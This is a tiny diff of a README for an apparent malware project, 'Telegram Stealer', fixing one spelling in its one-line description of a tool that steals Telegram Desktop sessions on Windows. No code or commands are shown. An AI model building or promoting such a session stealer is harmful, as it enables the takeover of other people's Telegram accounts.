FDlucifer/TgStealer/README.md

 # Telegram Stealer

-Stiller of sessions of the Telegram Desktop application on windows 7, 8 and 10
+Stealer of sessions of the Telegram Desktop application on windows 7, 8 and 10

 ## Install